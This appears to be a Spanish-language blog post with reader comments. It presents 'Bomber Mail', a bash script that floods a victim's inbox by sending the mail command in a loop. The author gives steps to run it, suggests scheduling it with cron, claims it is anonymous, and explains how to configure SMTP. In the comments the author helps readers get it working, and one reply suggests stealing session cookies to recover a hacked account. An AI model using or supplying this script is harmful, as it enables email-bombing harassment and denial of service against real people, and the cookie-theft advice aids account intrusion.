Bomber Mail

Bomber Mail

Pues aprovechando que estrenamos apartado dedicado al Hacking para su estudio , voy a dejaros un pequeño Shell-Script para Linux

que como bien su nombre indica se encarga de bombardear de manera masiva la bandeja de correo de nuestra víctima…

Tan solo es un pequeño experimento hecho en 10 minutos…Aquí el código:

#!/bin/bash
clear
echo "BOMBER MAIL BY JUANAN"
echo ""
echo "Introduce el texto del correo"
read texto

echo "Introduce asunto para el correo"
read cabezera

echo "Introduce la dirección del destinatario"
read direccion

echo "¿Cuántos correos envío?"
read x

a=0
echo "BOOOOOOOMMMM!!"

while [ $a -ne $x ]
 do
 echo $texto | mail -s "$cabezera" $direccion
 a=$[ $a + 1 ]
done

Como se puede ver son tan solo unas pocas lineas con un bucle de por medio…Tan solo con hacer un copy/paste del codigo,le asignamos permisos con:

chmod 700 bombermail.sh

Ejecutamos: ./bombermail.sh

…Y en cuestión de segundos llegaran los mails a la dirección de la víctima…Si por ejemplo marcamos 1000 mails,en unos segundos se recibirán miles de mails y de forma anónima, imaginaros programar el Cron con una pequeña modificación del Script etc… Se pueden hacer muchas cosas con un simple Script en Linux. Cuidadín con que fines usáis ésto…

En algunas ip’s, es posible que se necesite la ayuda de un servidor SMTP para que funcione el invento…No me voy a meter en esto,no es el caso,si no funciona buscad como configurar un servidor SMTP en Linux,no es difícil con una cuenta de gmail por ejemplo…

Y como siempre No me responsabilizo de un mal uso que le deis a el shell-script, solamente está posteado como curiosidad.

Saludos!!

Juan Antonio Vicent Martinez.

12 respuestas a “Bomber Mail

    • Si te han hackeado la cuenta lo llevas bastante mal,a no ser que les devuelvas la jugada,con algún xploit bastante currado,o que estés en la misma red cuando se conecten a tu cuenta y les saques las cookies…
      En definitiva,si no estás en la misma red que la persona que te a hackeado el msn es casi imposible hacerlo…
      Siento no poder ayudarte…Saludos

  1. ./bombermail.sh: línea 22: mail: orden no encontrada
    …no se donde se encuentra el problema…si podrias ayuadarme seria de gran ayuda..me canse de buscar en google y nada.

  2. …bien ahora el script funciona a la perfeccion…pero no llegan los mensajes…seguro que em falta configurar algo…mm y creo que viene por la configuracion del postfix..ya casi lo tengo…sigo probando…despues te cuento…
    Dos Saludos ñ_ñ

  3. …que dolor de cabeza esta mierda de postfix,sinceramente,no se por que la complican tanto..al final me tuve que pasar a la mierda de win para poder enviar e-mail masivos,solo dos click,uno para abrir el programa el otro para mandar y funciono a la perfeccion—si GNU/Linux quiere ganarle la guerra a la porqueria de mocosoft,bueno creo que se van a tener que poner las pilas en serio,y dejar de pensar que Linux solo lo pueden usar los fanaticos de la informatica…la verdad una GRAN DESCEPCION NO PODER ENVIAR EMAILS MASIVOS DESDE LINUX..igualmente excelente el script.

  4. ….estaria muy bueno capturas de pantalla….para ver si relamente funciona tu script…otro tema pasa por dejar la info a medio hacer…y pensar..que se arregle cada uno…digo si pones el script..acota aparte que se necita por ejemplo,postfix,smtp,y toda la configuracion posible para que ESTE SCRIPT FUNCIONE…desde ya saludos.(si estoy enojado,me descepciono GNU/Linux U_u )

    • jejeje, lo siento pero no..
      Aprende a programar en bash, en PHP, en Visual Basic, en java, o en lo que quieras puedes hacer un simple bomber mail, es una chorrada como una casa.
      Este blog no es para apoyar a la piratería ni a los spamers, el script lo puse como curiosidad,no tengo nada que demostrar, ni a ti, ni a nadie, ya que
      como digo, es simplemente una curiosidad, y sí, funciona…

      No puedes decepcionarte con GNU/Linux por que no te funcione un simple script programado en bash, puedes decepcionarte contigo mismo por no ser capaz de hacer funcionar una simple tontería como ésta…

      Te doy una pista va, create una cuenta de google y configura bien el SMTP del postfix si no te funciona o no tienes servidor smtp (va a ser que no como no tengas un server montado…)

      Un Saludo

  5. al hacerlo me aparece un mesnaje diciendo que el cuerpo del mensaje está vacío y que se espera que esté bien, pero no llega al destinatario. Que puedo hacer?

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s